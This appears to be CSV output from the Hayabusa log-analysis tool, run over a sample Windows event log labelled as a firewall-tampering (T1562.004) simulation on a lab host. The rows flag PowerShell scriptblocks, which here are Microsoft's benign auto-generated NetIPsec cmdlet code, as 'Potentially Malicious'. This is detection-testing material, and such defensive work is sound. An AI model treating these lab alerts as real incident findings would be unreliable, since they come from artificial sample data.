$script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [Syst",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"erSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecQuickModeCryptoSet' -Alias '*' function Remove-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [Syst",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"em.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeCryptoSet' -Alias '*' function Rename-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdleti",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"em.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { 